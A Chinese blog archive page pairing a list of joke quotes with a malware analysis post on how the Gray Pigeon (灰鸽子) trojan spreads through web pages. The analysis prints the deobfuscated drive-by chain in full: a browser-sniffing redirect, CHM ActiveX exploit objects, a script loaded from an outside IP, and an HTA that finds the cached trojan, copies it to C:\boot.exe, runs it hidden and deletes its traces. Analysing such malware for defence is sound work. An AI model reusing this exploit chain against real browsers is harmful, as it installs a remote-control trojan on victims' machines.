Category Archives: Uncategorized

加菲猫语录

1 Reply

Money is not everything. There’s MasterCard & Visa.
钞票不是万能的, 有时还需要信用卡

One should love animals. They are so tasty.
每个人都应该热爱动物, 因为它们很好吃

Save water. Shower with your girlfriend.
要节约用水, 尽量和女友一起洗澡

Love the neighbor. But don’t get caught.
要用心去爱你的邻居, 不过不要让她的老公知道

Behind every successful man, there is a woman.
And behind every unsuccessful man, there are two.
每个成功男人的背后, 都有一个女人. 每个不成功男人的背后, 都有两个

Every man should marry. After all, happiness is not the only thing in life.
再快乐的单身汉迟早也会结婚, 幸福不是永久的嘛

The wise never marry, and when they marry they become otherwise.
聪明人都是未婚的, 结婚的人很难再聪明起来

Success is a relative term. It brings so many relatives.
成功是一个相关名词, 他会给你带来很多不相关的亲戚 (联系)

Never put off the work till tomorrow what you can put off today.
不要等明天交不上差再找借口, 今天就要找好

Love is photogenic. It needs darkness to develop.
爱情就象照片, 需要大量的暗房时间来培养

Children in backseats cause accidents. Accidents in backseats cause children.
后排座位上的小孩会生出意外, 后排座位上的意外会生出小孩

Your future depends on your dreams. So go to sleep.
现在的梦想决定着你的将来, 所以还是再睡一会吧

There should be a better way to start a day than waking up every morning.
应该有更好的方式开始新一天, 而不是千篇一律的在每个上午都醒来

Hard work never killed anybody. But why take the risk?
努力工作不会导致死亡! 不过我不会用自己去证明

Work fascinates me. I can look at it for hours!
工作好有意思耶! 尤其是看着别人工作

God made relatives; Thank God we can choose our friends.
神决定了谁是你的亲戚, 幸运的是在选择朋友方面他给了你留了余地

When two’s company, three’s the result!
两个人的状态是不稳定的, 三个人才是!

A dress is like a barbed fence. It protects the premises without restricting the view.
服饰就象铁丝网, 它阻止你冒然行动但并不妨碍你尽情的观看

The more you learn, the more you know, the more you know, and the more you forget.
The more you forget, the less you know. So why bother to learn.
学的越多, 知道的越多, 知道的越多, 忘记的越多, 忘记的越多, 知道的越少, 为什么学来着

灰鸽子木马网页传播分析

2 Replies
最近中灰鸽子木马的人不少,分析一下灰鸽子的网页传播方式
黑鸽子会产生一个frame,如下:
 

<iframe src="http://www.qq.com/" width="800" height="600"></iframe> <script language=javascript>ie=’fucksnow’;ver=navigator.appVersion;if(!(ver.indexOf(‘NT 5.0′)==-1))ie=’nt’;if(!(ver.indexOf(‘Windows 98′)==-1)){ie=’98’;}location.href=ie+’.htm’;</script>

 
页面中嵌入的iframe是掩人耳目的,重要的不是ifrme部分,而是后面的javascrpit部分

<iframe src="http://www.qq.com/" width="800" height="600"></iframe>   //掩人耳目
<script language=javascript>
ie=’fucksnow’;                //定义变量ie=fucksnow
ver=navigator.appVersion;   //获得浏览器版本
if(!(ver.indexOf(‘NT 5.0′)==-1)) ie=’nt’;      //如果是2k系统则ie=nt
if(!(ver.indexOf(‘Windows 98′)==-1)) {ie=’98’;}   //定义变量ie=98
location.href=ie+’.htm’;    //重定向到 ie+’.htm’
</script>

 
佩服作者的细心,这三个htm:98.htm nt.htm 和fucksnow.htm只有一个地方不同,就是利用的chm文件的所在位置不一样,作者根据98 2k和 xp的帮助文件位置不同设置了几个不同的运行条件,从这方面看作者到做的非常好,比国内很多的软件商都要好得多
我们以fucksnow.htm为例做分析:如果直接查看fucksnow.htm的源代码可以看到里面似乎是乱码,其实不然,这是利用了IE解析Html代码的时候忽略空格的特性。我们把里面所有的空格去掉,再稍微整理,就可以看到下面的代码了(空格都被去掉了,代码有点乱)。
 

 
<SCRIPTlanguage=VScriptsrc="mmmmm.gif"></SCRIPT>               //加载mmmmm.gif,这个其实不是图片,后面会说到
<SCRIPTlanguage=VScriptsrc="xxxxx.pif"></SCRIPT>               //加载xxxxx.pif,灰鸽子木马
<HTML><BODY>
<divstyle="display:none">
//利用chm漏洞
<OBJECTid="news140"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
<PARAMname="Item1"value=’command;/windows/help/apps.chm’);</OBJECT>
<OBJECTid="news162"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><PARAMname="Command"value="RelatedTopics,MENU"><PARAMname="Window"value="$global_ifl">
//利用chm漏洞执行mmmmm.gif里面的脚本程序
<PARAMname="Item1"value=’command;javascript:eval("document.write("<SCRIPTlanguage=JScriptsrc="http://218.106.9.136/inc/mmmmm.gif""+String.fromCharCode(62)+"</SCR"+"IPT"+String.fromCharCode(62))")’>
</OBJECT>
</div>
<SCRIPT>news140.Click();f1=1+1;f1=f1+2;setTimeout("news162.Click();",0);fu1=2;fu1=3+4;</SCRIPT></BODY></HTML>
//又是一个障眼法,重定向到http://xuemulove.com/a.gif,文件不存在
<iframesrc="http://xuemulove.com/a.gif"width="0"height="0">
</iframe><BODYonload="window.status=’页面已装载!’">
mmmmm.gif分析:代码隐藏原理和fucksnow.htm一样,替换掉空格后看到以下代码

document.write(‘<html><HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD></html>’);    //把弹出窗口移到x,y=4000,4000的位置,另你看不到
//利用ADODB写文件
try{BOSSYU=newActiveXObject("ADODB.Recordset");BOSSYU.Fields.Append("a",200,3000);BOSSYU.Open();BOSSYU.AddNew();BOSSYU.Fields("a").Value="
//写进去的代码
<HTML><BODYonLoad="window.moveTo(4000,4000);">
<HEAD><SCRIPTlanguage=JScript>window.moveTo(4000,4000);window.resizeTo(0,0);</SCRIPT></HEAD>
//利用HTA执行所需要的操作
<HTA:APPLICATIONID=kk3714CAPTION="no"BORDER="none"HEIGHT="0"SHOWINTASKBAR="no"WIDTH="0">
<BODYscroll="no"leftmargin="0"topmargin="0"marginwidth="0"marginheight="0">
<SCRIPTLANGUAGE="JavaScript">
//在打开fucksnow.htm的时候已经加载了xxxxx.pif文件,这时该文件已经在IE的缓存中。由于IE的一些特性,该文件会被保存为xxxxx[1].pif xxxxx[2].pif等类似的文件名,下面的程序子就是为了把他找出来,并执行他
function thanks(b){
try{
varc=new Enumerator(YUri.GetFolder(b).SubFolders);
for(;!c.atEnd();c.moveNext())
{var zI01=c.item().Path+"xxxxx[1].pif";
var z1=c.item().Path+"xxxxx[2].pif";
var f="C:boot.exe";
if(YUri.FileExists(zI01))     //找到木马文件xxxxx[1].pif
 {YUri.CopyFile(zI01,f)     //copy到 c:boot.exe
w00sh.Run(f,0,false);      //执行木马
v=1;break;}
if(YUri.FileExists(z1))        //同上,只不过文件名为xxxxx[2].pif
{YUri.CopyFile(z1,f);
w00sh.Run(f,0,false);
v=1;break;}
thanks(c.item());}}
catch(e){}}
function agree(){
path="c:boOt.bat";     //建立boot.bat批处理
v=kk3714.commandLine;
v=v.substring(1,v.length-2);
var_w=YUri.CreateTextFile(path);
_w.Write(‘@eCho oFf rn:ArnDeL"’+v+’"rnifeXiSt"’+v+’"gOtoArnDEl%0′);   //写命令到boot.bat里面,BAT里面的内容:
====================
@echo off
:a del v     //删除v , v为该执行文件c:bootlog.hta
if exist v goto a   //如果还没删除则转到 a,继续执行删除操作
del 0%    //自删除
====================
_w.close();
w00sh.Run(path,0,false);
window.close();
}
//获得IE缓存存放位置以查找xxxxx.pif
varv=0;
try{
varYUri=newActiveXObject("Scripting.FileSystemObject");
varw00sh=newActiveXObject("WScript.Shell");
varcache=w00sh.RegRead("HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerShellFoldersCache");
}catch(e){}
function fish()
{try{if(v==0){thanks(cache+’..’);setTimeout("fish()",4000);}else{agree();}}catch(e){}}
fish();</SCRIPT></BODY></HTML>";
//存为c:bootlog.hta并执行
BOSSYU.Update();}catch(e){}try{BOSSYU.Save("c:bootlog.hta",0);}catch(e){}document.write(‘<objectid="bbs1"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="shortcut"><paramname=item1value=",c:bootlog.hta"></object>
<OBJECTid="bbs2"type="application/x-oleobject"classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"><paramname="Command"value="Close"><paramname=kav"value="out"></oBjEct>
<ScRipt>c=1;bbs1.Click();c=1;c=c+5;bbs2.Click();c=c+1;</script>’);

基本上是利用了chm漏洞,如果系统打过所有补丁是不会中招的;临时禁用java script也可以防止。